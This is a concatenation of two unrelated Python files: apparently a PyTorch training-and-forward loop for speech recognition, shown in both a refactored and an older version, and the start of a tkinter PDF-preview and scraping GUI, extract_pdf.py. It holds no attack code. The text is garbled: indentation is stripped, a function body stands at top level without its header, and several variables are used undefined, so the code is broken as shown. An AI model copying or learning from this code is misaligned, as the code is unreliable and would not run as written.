def _open_forward_output_files_and_get_file_handles(forward_outs, require_decodings, info_file, output_folder):
post_file = {}
for out_id in range(len(forward_outs)):
if require_decodings[out_id]:
out_file = info_file.replace(".info", "_" + forward_outs[out_id] + "_to_decode.ark")
else:
out_file = info_file.replace(".info", "_" + forward_outs[out_id] + ".ark")
post_file[forward_outs[out_id]] = open_or_fd(out_file, output_folder, "wb")
return post_file
def _get_batch_config(data_set_input, seq_model, to_do, data_name, batch_size):
N_snt = None
N_ex_tr = None
N_batches = None
if seq_model or to_do == "forward":
N_snt = len(data_name)
N_batches = int(N_snt / batch_size)
else:
N_ex_tr = data_set_input.shape[0]
N_batches = int(N_ex_tr / batch_size)
return N_snt, N_ex_tr, N_batches
def _prepare_input(
snt_index,
batch_size,
inp_dim,
ref_dim,
beg_snt_fea,
beg_snt_lab,
data_end_index_fea,
data_end_index_lab,
beg_batch,
end_batch,
seq_model,
arr_snt_len_fea,
arr_snt_len_lab,
data_set_inp,
data_set_ref,
use_cuda,
):
def _zero_padding(
inp,
ref,
max_len_fea,
max_len_lab,
data_end_index_fea,
data_end_index_lab,
data_set_inp,
data_set_ref,
beg_snt_fea,
beg_snt_lab,
snt_index,
k,
):
def _input_and_ref_have_same_time_dimension(N_zeros_fea, N_zeros_lab):
if N_zeros_fea == N_zeros_lab:
return True
return False
snt_len_fea = data_end_index_fea[snt_index] - beg_snt_fea
snt_len_lab = data_end_index_lab[snt_index] - beg_snt_lab
N_zeros_fea = max_len_fea - snt_len_fea
N_zeros_lab = max_len_lab - snt_len_lab
if _input_and_ref_have_same_time_dimension(N_zeros_fea, N_zeros_lab):
N_zeros_fea_left = random.randint(0, N_zeros_fea)
N_zeros_lab_left = N_zeros_fea_left
else:
N_zeros_fea_left = 0
N_zeros_lab_left = 0
inp[N_zeros_fea_left : N_zeros_fea_left + snt_len_fea, k, :] = data_set_inp[
beg_snt_fea : beg_snt_fea + snt_len_fea, :
]
ref[N_zeros_lab_left : N_zeros_lab_left + snt_len_lab, k, :] = data_set_ref[
beg_snt_lab : beg_snt_lab + snt_len_lab, :
]
return inp, ref, snt_len_fea, snt_len_lab
if len(data_set_ref.shape) == 1:
            data_set_ref = data_set_ref.view((data_set_ref.shape[0], 1))
        max_len_fea = 0
        max_len_lab = 0
if seq_model:
max_len_fea = int(max(arr_snt_len_fea[snt_index : snt_index + batch_size]))
max_len_lab = int(max(arr_snt_len_lab[snt_index : snt_index + batch_size]))
inp = torch.zeros(max_len_fea, batch_size, inp_dim).contiguous()
ref = torch.zeros(max_len_lab, batch_size, ref_dim).contiguous()
for k in range(batch_size):
inp, ref, snt_len_fea, snt_len_lab = _zero_padding(
inp,
ref,
max_len_fea,
max_len_lab,
data_end_index_fea,
data_end_index_lab,
data_set_inp,
data_set_ref,
beg_snt_fea,
beg_snt_lab,
snt_index,
k,
)
beg_snt_fea = data_end_index_fea[snt_index]
beg_snt_lab = data_end_index_lab[snt_index]
snt_index = snt_index + 1
else:
if to_do != "forward":
inp = data_set[beg_batch:end_batch, :].contiguous()
else:
snt_len_fea = data_end_index_fea[snt_index] - beg_snt_fea
snt_len_lab = data_end_index_lab[snt_index] - beg_snt_lab
inp = data_set_inp[beg_snt_fea : beg_snt_fea + snt_len_fea, :].contiguous()
ref = data_set_ref[beg_snt_lab : beg_snt_lab + snt_len_lab, :].contiguous()
beg_snt_fea = data_end_index_fea[snt_index]
beg_snt_lab = data_end_index_lab[snt_index]
snt_index = snt_index + 1
if use_cuda:
inp = inp.cuda()
ref = ref.cuda()
return inp, ref, max_len_fea, max_len_lab, snt_len_fea, snt_len_lab, beg_snt_fea, beg_snt_lab, snt_index
def _optimization_step(optimizers, outs_dict, config, arch_dict):
for opt in optimizers.keys():
optimizers[opt].zero_grad()
outs_dict["loss_final"].backward()
for opt in optimizers.keys():
if not (strtobool(config[arch_dict[opt][0]]["arch_freeze"])):
optimizers[opt].step()
def _update_progress_bar(to_do, i, N_batches, loss_sum):
if to_do == "train":
status_string = (
"Training | (Batch "
+ str(i + 1)
+ "/"
+ str(N_batches)
+ ")"
+ " | L:"
+ str(round(loss_sum.cpu().item() / (i + 1), 3))
)
if i == N_batches - 1:
status_string = "Training | (Batch " + str(i + 1) + "/" + str(N_batches) + ")"
if to_do == "valid":
status_string = "Validating | (Batch " + str(i + 1) + "/" + str(N_batches) + ")"
if to_do == "forward":
status_string = "Forwarding | (Batch " + str(i + 1) + "/" + str(N_batches) + ")"
progress(i, N_batches, status=status_string)
def _write_info_file(info_file, to_do, loss_tot, err_tot, elapsed_time_chunk):
with open(info_file, "w") as text_file:
text_file.write("[results]\n")
if to_do != "forward":
text_file.write("loss=%s\n" % loss_tot.cpu().numpy())
text_file.write("err=%s\n" % err_tot.cpu().numpy())
text_file.write("elapsed_time_chunk=%f\n" % elapsed_time_chunk)
text_file.close()
def _save_model(to_do, nns, multi_gpu, optimizers, info_file, arch_dict):
if to_do == "train":
for net in nns.keys():
checkpoint = {}
if multi_gpu:
checkpoint["model_par"] = nns[net].module.state_dict()
else:
checkpoint["model_par"] = nns[net].state_dict()
if net in optimizers:
checkpoint["optimizer_par"] = optimizers[net].state_dict()
else:
checkpoint["optimizer_par"] = dict()
out_file = info_file.replace(".info", "_" + arch_dict[net][0] + ".pkl")
torch.save(checkpoint, out_file)
def _get_dim_from_data_set(data_set_inp, data_set_ref):
inp_dim = data_set_inp.shape[1]
ref_dim = 1
if len(data_set_ref.shape) > 1:
ref_dim = data_set_ref.shape[1]
return inp_dim, ref_dim
from data_io import read_lab_fea_refac01 as read_lab_fea
from utils import forward_model_refac01 as forward_model
config = _read_chunk_specific_config(cfg_file)
_initialize_random_seed(config)
output_folder = config["exp"]["out_folder"]
use_cuda = strtobool(config["exp"]["use_cuda"])
multi_gpu = strtobool(config["exp"]["multi_gpu"])
to_do = config["exp"]["to_do"]
info_file = config["exp"]["out_info"]
model = config["model"]["model"].split("\n")
forward_outs = config["forward"]["forward_out"].split(",")
forward_normalize_post = list(map(strtobool, config["forward"]["normalize_posteriors"].split(",")))
forward_count_files = config["forward"]["normalize_with_counts_from"].split(",")
require_decodings = list(map(strtobool, config["forward"]["require_decoding"].split(",")))
save_gpumem = strtobool(config["exp"]["save_gpumem"])
is_production = strtobool(config["exp"]["production"])
batch_size = _get_batch_size_from_config(config, to_do)
if processed_first:
shared_list = list()
p = read_next_chunk_into_shared_list_with_subprocess(
read_lab_fea, shared_list, cfg_file, is_production, output_folder, wait_for_process=True
)
data_name, data_end_index_fea, data_end_index_lab, fea_dict, lab_dict, arch_dict, data_set_dict = extract_data_from_shared_list(
shared_list
)
data_set_inp, data_set_ref = convert_numpy_to_torch(data_set_dict, save_gpumem, use_cuda)
else:
data_set_inp = data_set["input"]
data_set_ref = data_set["ref"]
data_end_index_fea = data_end_index["fea"]
data_end_index_lab = data_end_index["lab"]
shared_list = list()
data_loading_process = None
    if next_config_file is not None:
data_loading_process = read_next_chunk_into_shared_list_with_subprocess(
read_lab_fea, shared_list, next_config_file, is_production, output_folder, wait_for_process=False
)
nns, costs, optimizers, inp_out_dict = _load_model_and_optimizer(
fea_dict, model, config, arch_dict, use_cuda, multi_gpu, to_do
)
if to_do == "forward":
post_file = _open_forward_output_files_and_get_file_handles(
forward_outs, require_decodings, info_file, output_folder
)
seq_model = is_sequential_dict(config, arch_dict)
N_snt, N_ex_tr, N_batches = _get_batch_config(data_set_inp, seq_model, to_do, data_name, batch_size)
beg_batch = 0
end_batch = batch_size
snt_index = 0
beg_snt_fea = 0
beg_snt_lab = 0
arr_snt_len_fea = shift(shift(data_end_index_fea, -1, 0) - data_end_index_fea, 1, 0)
arr_snt_len_lab = shift(shift(data_end_index_lab, -1, 0) - data_end_index_lab, 1, 0)
arr_snt_len_fea[0] = data_end_index_fea[0]
arr_snt_len_lab[0] = data_end_index_lab[0]
data_set_inp_dim, data_set_ref_dim = _get_dim_from_data_set(data_set_inp, data_set_ref)
inp_dim = data_set_inp_dim + data_set_ref_dim
loss_sum = 0
err_sum = 0
start_time = time.time()
for i in range(N_batches):
inp, ref, max_len_fea, max_len_lab, snt_len_fea, snt_len_lab, beg_snt_fea, beg_snt_lab, snt_index = _prepare_input(
snt_index,
batch_size,
data_set_inp_dim,
data_set_ref_dim,
beg_snt_fea,
beg_snt_lab,
data_end_index_fea,
data_end_index_lab,
beg_batch,
end_batch,
seq_model,
arr_snt_len_fea,
arr_snt_len_lab,
data_set_inp,
data_set_ref,
use_cuda,
)
if to_do == "train":
outs_dict = forward_model(
fea_dict,
lab_dict,
arch_dict,
model,
nns,
costs,
inp,
ref,
inp_out_dict,
max_len_fea,
max_len_lab,
batch_size,
to_do,
forward_outs,
)
_optimization_step(optimizers, outs_dict, config, arch_dict)
else:
with torch.no_grad():
outs_dict = forward_model(
fea_dict,
lab_dict,
arch_dict,
model,
nns,
costs,
inp,
ref,
inp_out_dict,
max_len_fea,
max_len_lab,
batch_size,
to_do,
forward_outs,
)
if to_do == "forward":
for out_id in range(len(forward_outs)):
out_save = outs_dict[forward_outs[out_id]].data.cpu().numpy()
if forward_normalize_post[out_id]:
counts = load_counts(forward_count_files[out_id])
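                        # Dividing the network posteriors by the class priors
                        # (here: subtracting log-priors estimated from the state
                        # counts) turns them into scaled likelihoods, which is
                        # what the HMM decoder expects.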
out_save = out_save - np.log(counts / np.sum(counts))
write_mat(output_folder, post_file[forward_outs[out_id]], out_save, data_name[i])
else:
loss_sum = loss_sum + outs_dict["loss_final"].detach()
err_sum = err_sum + outs_dict["err_final"].detach()
beg_batch = end_batch
end_batch = beg_batch + batch_size
_update_progress_bar(to_do, i, N_batches, loss_sum)
elapsed_time_chunk = time.time() - start_time
loss_tot = loss_sum / N_batches
err_tot = err_sum / N_batches
del inp, ref, outs_dict, data_set_inp_dim, data_set_ref_dim
_save_model(to_do, nns, multi_gpu, optimizers, info_file, arch_dict)
if to_do == "forward":
for out_name in forward_outs:
post_file[out_name].close()
_write_info_file(info_file, to_do, loss_tot, err_tot, elapsed_time_chunk)
    if data_loading_process is not None:
data_loading_process.join()
data_name, data_end_index_fea, data_end_index_lab, fea_dict, lab_dict, arch_dict, data_set_dict = extract_data_from_shared_list(
shared_list
)
data_set_inp, data_set_ref = convert_numpy_to_torch(data_set_dict, save_gpumem, use_cuda)
data_set = {"input": data_set_inp, "ref": data_set_ref}
data_end_index = {"fea": data_end_index_fea, "lab": data_end_index_lab}
return [data_name, data_set, data_end_index, fea_dict, lab_dict, arch_dict]
else:
return [None, None, None, None, None, None]
def count_parameters(model):
table = PrettyTable(["Modules", "Parameters"])
total_params = 0
for name, parameter in model.named_parameters():
if not parameter.requires_grad: continue
param = parameter.numel()
table.add_row([name, param])
total_params+=param
print(table)
print(f"Total Trainable Params: {total_params}")
return total_params
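# A minimal usage sketch (the layer is hypothetical):
#   count_parameters(torch.nn.Linear(52, 10))
#   # prints the per-module table and "Total Trainable Params: 530"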
def run_nn(
data_name, data_set, data_end_index, fea_dict, lab_dict, arch_dict, cfg_file, processed_first, next_config_file
):
    # This function processes the current chunk using the information in cfg_file. In parallel, the next chunk is loaded into CPU memory.
# Reading chunk-specific cfg file (first argument-mandatory file)
if not (os.path.exists(cfg_file)):
sys.stderr.write("ERROR: The config file %s does not exist!\n" % (cfg_file))
        sys.exit(1)
else:
config = configparser.ConfigParser()
config.read(cfg_file)
# Setting torch seed
seed = int(config["exp"]["seed"])
torch.manual_seed(seed)
random.seed(seed)
np.random.seed(seed)
# Reading config parameters
output_folder = config["exp"]["out_folder"]
use_cuda = strtobool(config["exp"]["use_cuda"])
multi_gpu = strtobool(config["exp"]["multi_gpu"])
to_do = config["exp"]["to_do"]
info_file = config["exp"]["out_info"]
model = config["model"]["model"].split("\n")
forward_outs = config["forward"]["forward_out"].split(",")
forward_normalize_post = list(map(strtobool, config["forward"]["normalize_posteriors"].split(",")))
forward_count_files = config["forward"]["normalize_with_counts_from"].split(",")
require_decodings = list(map(strtobool, config["forward"]["require_decoding"].split(",")))
save_gpumem = strtobool(config["exp"]["save_gpumem"])
is_production = strtobool(config["exp"]["production"])
if to_do == "train":
batch_size = int(config["batches"]["batch_size_train"])
if to_do == "valid":
batch_size = int(config["batches"]["batch_size_valid"])
if to_do == "forward":
batch_size = 1
# ***** Reading the Data********
if processed_first:
# Reading all the features and labels for this chunk
shared_list = []
p = threading.Thread(target=read_lab_fea, args=(cfg_file, is_production, shared_list, output_folder))
p.start()
p.join()
data_name = shared_list[0]
data_end_index = shared_list[1]
fea_dict = shared_list[2]
lab_dict = shared_list[3]
arch_dict = shared_list[4]
data_set = shared_list[5]
# print('*************')
# print(len(data_name), len(data_set), len(data_end_index), len(fea_dict), len(lab_dict), len(arch_dict))
# print('*************')
# converting numpy tensors into pytorch tensors and put them on GPUs if specified
if not (save_gpumem) and use_cuda:
data_set = torch.from_numpy(data_set).float().cuda()
else:
data_set = torch.from_numpy(data_set).float()
# Reading all the features and labels for the next chunk
shared_list = []
p = threading.Thread(target=read_lab_fea, args=(next_config_file, is_production, shared_list, output_folder))
p.start()
# Reading model and initialize networks
inp_out_dict = fea_dict
# print(inp_out_dict, len(inp_out_dict))
[nns, costs] = model_init(inp_out_dict, model, config, arch_dict, use_cuda, multi_gpu, to_do)
# print(nns)
# cop=0
# for net in nns.keys():
# cop+=count_parameters(nns[net])
# # summary(nns[net], (-1, 52))
# print(cop)
# optimizers initialization
optimizers = optimizer_init(nns, config, arch_dict)
# pre-training and multi-gpu init
for net in nns.keys():
pt_file_arch = config[arch_dict[net][0]]["arch_pretrain_file"]
if pt_file_arch != "none":
if use_cuda:
checkpoint_load = torch.load(pt_file_arch)
else:
checkpoint_load = torch.load(pt_file_arch, map_location="cpu")
nns[net].load_state_dict(checkpoint_load["model_par"])
optimizers[net].load_state_dict(checkpoint_load["optimizer_par"])
optimizers[net].param_groups[0]["lr"] = float(
config[arch_dict[net][0]]["arch_lr"]
) # loading lr of the cfg file for pt
if multi_gpu:
nns[net] = torch.nn.DataParallel(nns[net])
if to_do == "forward":
post_file = {}
for out_id in range(len(forward_outs)):
if require_decodings[out_id]:
out_file = info_file.replace(".info", "_" + forward_outs[out_id] + "_to_decode.ark")
else:
out_file = info_file.replace(".info", "_" + forward_outs[out_id] + ".ark")
post_file[forward_outs[out_id]] = open_or_fd(out_file, output_folder, "wb")
# check automatically if the model is sequential
seq_model = is_sequential_dict(config, arch_dict)
# ***** Minibatch Processing loop********
if seq_model or to_do == "forward":
N_snt = len(data_name)
N_batches = int(N_snt / batch_size)
else:
N_ex_tr = data_set.shape[0]
N_batches = int(N_ex_tr / batch_size)
beg_batch = 0
end_batch = batch_size
snt_index = 0
beg_snt = 0
start_time = time.time()
# array of sentence lengths
arr_snt_len = shift(shift(data_end_index, -1, 0) - data_end_index, 1, 0)
arr_snt_len[0] = data_end_index[0]
loss_sum = 0
err_sum = 0
inp_dim = data_set.shape[1]
for i in range(N_batches):
max_len = 0
if seq_model:
max_len = int(max(arr_snt_len[snt_index : snt_index + batch_size]))
inp = torch.zeros(max_len, batch_size, inp_dim).contiguous()
for k in range(batch_size):
snt_len = data_end_index[snt_index] - beg_snt
N_zeros = max_len - snt_len
                # Prepend a random number of zeros; the remaining padding goes at the end.
N_zeros_left = random.randint(0, N_zeros)
# randomizing could have a regularization effect
inp[N_zeros_left : N_zeros_left + snt_len, k, :] = data_set[beg_snt : beg_snt + snt_len, :]
beg_snt = data_end_index[snt_index]
snt_index = snt_index + 1
else:
# features and labels for batch i
if to_do != "forward":
inp = data_set[beg_batch:end_batch, :].contiguous()
else:
snt_len = data_end_index[snt_index] - beg_snt
inp = data_set[beg_snt : beg_snt + snt_len, :].contiguous()
beg_snt = data_end_index[snt_index]
snt_index = snt_index + 1
# use cuda
if use_cuda:
inp = inp.cuda()
if to_do == "train":
# Forward input, with autograd graph active
outs_dict = forward_model(
fea_dict,
lab_dict,
arch_dict,
model,
nns,
costs,
inp,
inp_out_dict,
max_len,
batch_size,
to_do,
forward_outs,
)
for opt in optimizers.keys():
optimizers[opt].zero_grad()
outs_dict["loss_final"].backward()
# Gradient Clipping (th 0.1)
# for net in nns.keys():
# torch.nn.utils.clip_grad_norm_(nns[net].parameters(), 0.1)
for opt in optimizers.keys():
if not (strtobool(config[arch_dict[opt][0]]["arch_freeze"])):
optimizers[opt].step()
else:
with torch.no_grad(): # Forward input without autograd graph (save memory)
outs_dict = forward_model(
fea_dict,
lab_dict,
arch_dict,
model,
nns,
costs,
inp,
inp_out_dict,
max_len,
batch_size,
to_do,
forward_outs,
)
if to_do == "forward":
for out_id in range(len(forward_outs)):
out_save = outs_dict[forward_outs[out_id]].data.cpu().numpy()
if forward_normalize_post[out_id]:
                        # load the state counts used as priors to normalize the posteriors
counts = load_counts(forward_count_files[out_id])
out_save = out_save - np.log(counts / np.sum(counts))
# save the output
write_mat(output_folder, post_file[forward_outs[out_id]], out_save, data_name[i])
else:
loss_sum = loss_sum + outs_dict["loss_final"].detach()
err_sum = err_sum + outs_dict["err_final"].detach()
# update it to the next batch
beg_batch = end_batch
end_batch = beg_batch + batch_size
# Progress bar
if to_do == "train":
status_string = (
"Training | (Batch "
+ str(i + 1)
+ "/"
+ str(N_batches)
+ ")"
+ " | L:"
+ str(round(loss_sum.cpu().item() / (i + 1), 3))
)
if i == N_batches - 1:
status_string = "Training | (Batch " + str(i + 1) + "/" + str(N_batches) + ")"
if to_do == "valid":
status_string = "Validating | (Batch " + str(i + 1) + "/" + str(N_batches) + ")"
if to_do == "forward":
status_string = "Forwarding | (Batch " + str(i + 1) + "/" + str(N_batches) + ")"
progress(i, N_batches, status=status_string)
elapsed_time_chunk = time.time() - start_time
loss_tot = loss_sum / N_batches
err_tot = err_sum / N_batches
# clearing memory
del inp, outs_dict, data_set
# save the model
if to_do == "train":
for net in nns.keys():
checkpoint = {}
if multi_gpu:
checkpoint["model_par"] = nns[net].module.state_dict()
else:
checkpoint["model_par"] = nns[net].state_dict()
checkpoint["optimizer_par"] = optimizers[net].state_dict()
out_file = info_file.replace(".info", "_" + arch_dict[net][0] + ".pkl")
torch.save(checkpoint, out_file)
if to_do == "forward":
for out_name in forward_outs:
post_file[out_name].close()
# Write info file
with open(info_file, "w") as text_file:
text_file.write("[results]\n")
if to_do != "forward":
text_file.write("loss=%s\n" % loss_tot.cpu().numpy())
text_file.write("err=%s\n" % err_tot.cpu().numpy())
text_file.write("elapsed_time_chunk=%f\n" % elapsed_time_chunk)
text_file.close()
# Getting the data for the next chunk (read in parallel)
p.join()
data_name = shared_list[0]
data_end_index = shared_list[1]
fea_dict = shared_list[2]
lab_dict = shared_list[3]
arch_dict = shared_list[4]
data_set = shared_list[5]
# converting numpy tensors into pytorch tensors and put them on GPUs if specified
if not (save_gpumem) and use_cuda:
data_set = torch.from_numpy(data_set).float().cuda()
else:
data_set = torch.from_numpy(data_set).float()
#reset gpu memory
torch.cuda.empty_cache()
return [data_name, data_set, data_end_index, fea_dict, lab_dict, arch_dict]
|
extract_pdf.py
|
from download.spiders import download_pdfs
from utils import constants
from gui import scroll_frame
from extraction import adobe_json
import fitz, logging, multiprocessing
from tkinter import *
from tkinter import font, filedialog, messagebox
from tkinter.ttk import Progressbar
from functools import partial
class ExtractPDF(Frame):
def __init__(self, master=None):
"""Create a subclass of Frame for our window element. Initialize and set
the variable defaults."""
Frame.__init__(self, master)
self.master = master
self.myfont = font.Font(family="Ubuntu", size=16)
self.zoom_on = False
self.init_window()
def init_window(self):
"""Construct the layout of the window element."""
# Create PanedWindow for split layout.
self.pw = PanedWindow(self.master, sashrelief="raised", sashwidth=10)
# Extraction options frame (left side) to hold all options.
self.extract_options = Frame(self.pw)
# Scrapy options. (Download/Scrape PDF Files)
self.scrapy_download = Frame(self.extract_options, relief="groove", borderwidth=2, padx=10, pady=10)
self.scrapy_download_top = Frame(self.scrapy_download)
self.scrapy_download_top.pack(fill="both", expand=1)
self.scrapy_download_middle = Frame(self.scrapy_download)
self.scrapy_download_middle.pack(fill="both", expand=1)
self.scrapy_download_left = Frame(self.scrapy_download_middle)
self.scrapy_download_left.pack(side="left", fill="both")
self.scrapy_download_right = Frame(self.scrapy_download_middle)
self.scrapy_download_right.pack(side="right", fill="both")
self.scrapy_download_bottom = Frame(self.scrapy_download)
self.scrapy_download_bottom.pack(fill="both", expand=1)
self.scrapy_download_lbl = Label(self.scrapy_download_top, text="Scrape PDF Files From Website.")
self.scrapy_download_lbl.pack(side="left", fill="x")
self.scrapy_download_url_ent_val = StringVar()
self.scrapy_download_url_ent_lbl = Label(self.scrapy_download_left, text="Enter a URL, e.g. https://example.com/")
self.scrapy_download_url_ent_lbl.pack(fill="x")
self.scrapy_download_url_ent = Entry(self.scrapy_download_left, width=40, textvariable=self.scrapy_download_url_ent_val)
self.scrapy_download_url_ent.pack(fill="x", expand=1)
self.scrapy_download_domain_ent_val = StringVar()
self.scrapy_download_domain_ent_lbl = Label(self.scrapy_download_right, text="Enter a domain, e.g. example.com/")
self.scrapy_download_domain_ent_lbl.pack(fill="x")
self.scrapy_download_domain_ent = Entry(self.scrapy_download_right, width=40, textvariable=self.scrapy_download_domain_ent_val)
self.scrapy_download_domain_ent.pack(fill="x", expand=1)
self.scrapy_download_progress_bar = Progressbar(self.scrapy_download_bottom, mode="indeterminate")
self.scrapy_download_progress_bar.pack(fill="x", expand=1)
self.scrapy_download_btn = Button(self.scrapy_download_bottom, text="Start Crawler", width=20, command=self.start_crawler)
self.scrapy_download_btn.pack(fill="x", expand=1)
self.scrapy_download.pack(fill="both")
# Adobe API options.
self.adobe_api = Frame(self.extract_options, relief="groove", borderwidth=2, padx=10, pady=10)
self.adobe_api_top = Frame(self.adobe_api)
self.adobe_api_top.pack(fill="both", expand=1)
self.adobe_api_middle = Frame(self.adobe_api)
self.adobe_api_middle.pack(fill="both", expand=1)
self.adobe_api_bottom = Frame(self.adobe_api)
self.adobe_api_bottom.pack(fill="both", expand=1)
self.adobe_api_left = Frame(self.adobe_api_middle)
self.adobe_api_left.pack(side="left", fill="both")
self.adobe_api_right = Frame(self.adobe_api_middle)
self.adobe_api_right.pack(side="right", fill="both")
self.adobe_api_lbl = Label(self.adobe_api_top, text="Adobe PDF Extract API")
self.adobe_api_lbl.pack(side="left", fill="x")
self.adobe_api_ent_multi_val = StringVar()
self.adobe_api_ent_multi = Entry(self.adobe_api_left, width=60, textvariable=self.adobe_api_ent_multi_val)
self.adobe_api_ent_multi.pack(fill="x", expand=1)
self.adobe_api_btn_multi = Button(self.adobe_api_right, text="Select Folder",width=20, command=self.adobe_browse_folder)
self.adobe_api_btn_multi.pack(fill="x")
self.adobe_api_ent_single_val = StringVar()
self.adobe_api_ent_single = Entry(self.adobe_api_left, width=60, textvariable=self.adobe_api_ent_single_val)
self.adobe_api_ent_single.pack(fill="x", expand=1)
self.adobe_api_btn_single = Button(self.adobe_api_right, text="Select File",width=20, command=self.adobe_browse_file)
self.adobe_api_btn_single.pack(fill="x")
self.adobe_api_progress_bar = Progressbar(self.adobe_api_bottom, mode="indeterminate")
self.adobe_api_progress_bar.pack(fill="x", expand=1)
self.adobe_api_btn_send = Button(self.adobe_api_bottom, text="Send Request(s)", command=self.generate_adobe_request)
self.adobe_api_btn_send.pack(fill="x", expand=1)
self.adobe_api.pack(fill="both")
# PyMuPDF/OCR options. (Auto Extraction)
self.auto_extract = Frame(self.extract_options, relief="groove", borderwidth=2, padx=10, pady=10)
self.auto_some_text = Label(self.auto_extract, text="Auto Content Extraction.")
self.auto_some_text.pack(fill="x", expand=1)
self.auto_extract.pack(fill="both", expand=1)
# PyMuPDF/OCR options. (Manual Extraction)
self.manual_extract = Frame(self.extract_options, relief="groove", borderwidth=2, padx=10, pady=10)
self.manual_some_text = Label(self.manual_extract, text="Manual Content Extraction.")
self.manual_some_text.pack(fill="x", expand=1)
self.manual_extract.pack(fill="both", expand=1)
# PDF preview area (right side) with controls for navigation, zoom, etc
# at the top and the scrollable PDF preview below.
self.preview_area = Frame(self.pw)
# Controls for navigation, zoom, etc.
self.top_bar = Frame(self.preview_area, relief="groove", borderwidth=2, padx=10, pady=10)
self.open_btn = Button(self.top_bar, text="Open", command=self.open_extract)
self.open_btn.pack(side="left", padx=0, pady=0)
self.next_btn = Button(self.top_bar, text="Next", state="disabled", command=self.next_page)
self.next_btn.pack(side="left", padx=0, pady=0)
self.prev_btn = Button(self.top_bar, text="Prev", state="disabled", command=self.prev_page)
self.prev_btn.pack(side="left", padx=0, pady=0)
self.zoom_btn = Button(self.top_bar, text="Zoom", state="disabled", command=self.toggle_zoom)
self.zoom_btn.pack(side="left", padx=0, pady=0)
self.top_bar.pack(side="top", fill="x")
# Scrollable PDF preview area.
self.pdf_preview = scroll_frame.ScrollFrame(self.preview_area)
self.pdf_page_img = Label(self.pdf_preview.view_port, text="Open a PDF to view or manually extract content.", image=None, pady=150)
self.pdf_page_img.pack(side="left", fill="both", expand=1)
self.pdf_preview.pack(side="bottom", fill="both", expand=1)
# Add the Extraction and Preview areas to the PanedWindow.
self.pw.add(self.extract_options)
self.pw.add(self.preview_area)
self.pw.pack(fill="both", expand=True)
# ------------------------------------------------------------------------------
# Open the PDF file to view/edit/extract from.
# ------------------------------------------------------------------------------
def open_extract(self):
"""Open a file dialog and ask for an input file for the previewer to load
and display."""
        self.fname = filedialog.askopenfilename(
title="PDF Toolbox Document Browser",
initialdir=constants.pdf_dir,
filetypes=(
("PDF Files", "*.pdf"),
("XPS Files", "*.*xps"),
("Epub Files", "*.epub"),
("Fiction Books", "*.fb2"),
("Comic Books", "*.cbz"),
("HTML", "*.htm*")
)
)
if not self.fname:
messagebox.showerror(title="Cancelling.", message="No file chosen.")
return
self.doc = fitz.open(self.fname)
self.page_count = len(self.doc)
# Allocate storage for page display lists.
self.dlist_tab = [None] * self.page_count
self.max_width = self.pdf_preview.winfo_screenwidth() - 20
self.max_height = self.pdf_preview.winfo_screenheight() - 150
self.max_size = (self.max_width, self.max_height)
self.cur_page = 0
# If zoom is on, display twice as large.
if self.zoom_on == False:
self.data, self.clip_pos = self.get_page(
self.cur_page,
max_size=self.max_size
)
elif self.zoom_on == True:
self.data, self.clip_pos = self.get_page(
self.cur_page,
max_size=self.zoom_max_size
)
self.pdf_page_data = PhotoImage(data=self.data)
self.pdf_page_img.configure(image=self.pdf_page_data, text=None)
# Set button states to normal after file has been loaded.
self.next_btn.configure(state="normal")
self.prev_btn.configure(state="normal")
self.zoom_btn.configure(state="normal")
# ------------------------------------------------------------------------------
# Read the page data.
# ------------------------------------------------------------------------------
def get_page(self, pno, max_size=None):
"""Return a tkinter.PhotoImage or a PNG image for a document page number.
:arg int pno: 0-based page number
:arg max_size: (width, height) of available image area"""
# Get display list of page number.
self.dlist = self.dlist_tab[pno]
# Create if not yet there.
if not self.dlist:
self.dlist_tab[pno] = self.doc[pno].get_displaylist()
self.dlist = self.dlist_tab[pno]
# The page rectangle.
self.r = self.dlist.rect
self.clip = self.r
# Ensure image fits screen: exploit, but do not exceed width or height.
self.zoom_0 = 1
if max_size:
self.zoom_0 = min(1, max_size[0] / self.r.width, max_size[1] / self.r.height)
if self.zoom_0 == 1:
self.zoom_0 = min(max_size[0] / self.r.width, max_size[1] / self.r.height)
self.mat_0 = fitz.Matrix(self.zoom_0, self.zoom_0)
self.pix = self.dlist.get_pixmap(matrix=self.mat_0, alpha=False)
# Make PPM image from pixmap for tkinter.
self.img = self.pix.tobytes("ppm")
# Return image and clip position.
return self.img, self.clip.tl
def next_page(self):
"""When called, load the next PDF page."""
self.cur_page += 1
# Sanitize page number and wrap around.
while self.cur_page >= self.page_count:
self.cur_page -= self.page_count
# Pages < 0 are valid but look bad.
while self.cur_page < 0:
self.cur_page += self.page_count
if self.zoom_on == False:
self.data, self.clip_pos = self.get_page(
self.cur_page,
max_size=self.max_size
)
elif self.zoom_on == True:
self.data, self.clip_pos = self.get_page(
self.cur_page,
max_size=self.zoom_max_size
)
self.pdf_page_data = PhotoImage(data=self.data)
self.pdf_page_img.configure(image=self.pdf_page_data, text=None)
def prev_page(self):
"""When called, load the previous PDF page."""
self.cur_page -= 1
# Sanitize page number and wrap around.
while self.cur_page >= self.page_count:
self.cur_page -= self.page_count
# Pages < 0 are valid but look bad.
while self.cur_page < 0:
self.cur_page += self.page_count
if self.zoom_on == False:
self.data, self.clip_pos = self.get_page(
self.cur_page,
max_size=self.max_size
)
elif self.zoom_on == True:
self.data, self.clip_pos = self.get_page(
self.cur_page,
max_size=self.zoom_max_size
)
self.pdf_page_data = PhotoImage(data=self.data)
self.pdf_page_img.configure(image=self.pdf_page_data, text=None)
def toggle_zoom(self):
"""Toggle zoom on or off. When zoomed pages a displayed at twice their
normal size."""
if self.zoom_on == False:
self.zoom_on = True
self.zoom_width = self.max_width * 2
self.zoom_height = self.max_height * 2
self.zoom_max_size = (self.zoom_width, self.zoom_height)
self.data, self.clip_pos = self.get_page(
self.cur_page,
max_size=self.zoom_max_size
)
elif self.zoom_on == True:
self.zoom_on = False
self.data, self.clip_pos = self.get_page(
self.cur_page,
max_size=self.max_size
)
self.pdf_page_data = PhotoImage(data=self.data)
self.pdf_page_img.configure(image=self.pdf_page_data, text=None)
def adobe_browse_folder(self):
"""Browse for a folder and set the Entry field to the chosen folder."""
pdf_dir = filedialog.askdirectory(title="PDF Toolbox Document Browser", initialdir=constants.src_dir)
self.adobe_api_ent_multi_val.set(pdf_dir)
self.adobe_api_ent_single_val.set("")
def adobe_browse_file(self):
"""Browse for a file and set the Entry field to the chosen file."""
pdf_file = filedialog.askopenfilename(
title="PDF Toolbox Document Browser",
initialdir=constants.src_dir,
filetypes=(
("PDF Files", "*.pdf"),
("XPS Files", "*.*xps"),
("Epub Files", "*.epub"),
("Fiction Books", "*.fb2"),
